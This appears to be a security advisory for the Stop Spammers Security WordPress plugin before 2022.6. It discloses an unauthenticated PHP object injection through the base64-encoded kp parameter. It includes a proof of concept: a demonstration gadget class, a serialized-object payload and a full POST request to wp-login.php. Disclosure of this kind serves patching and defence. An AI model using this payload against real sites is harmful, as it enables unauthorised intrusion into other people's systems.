Stop Spammers Security < 2022.6 - Unauthenticated PHP Object Injection

The plugin passes base64 encoded user input to the unserialize() PHP function when CAPTCHA are used as second challenge, which could lead to PHP Object injection if a plugin installed on the blog has a suitable gadget chain

PoC

To simulate a gadget chain, put the following code in a plugin class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } On a page where the request is blocked and the second challenge is set to a CAPTCHA (such as reCAPTCHA), send dummy data, intercept it and change the kp parameter with the following payload: Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:“Evil”:0:{};) POST /wp-login.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 176 Connection: close Upgrade-Insecure-Requests: 1 kn=6dc52e6b54&ss;_block=G&kp;=Tzo0OiJFdmlsIjowOnt9Ow%3D%3D&kr;=Allow+List+Email%3A+block%40email.com&ka;=block%40email.com&ke;=cwenf&km;=cc&recaptcha;=recaptcha&g-recaptcha-response;=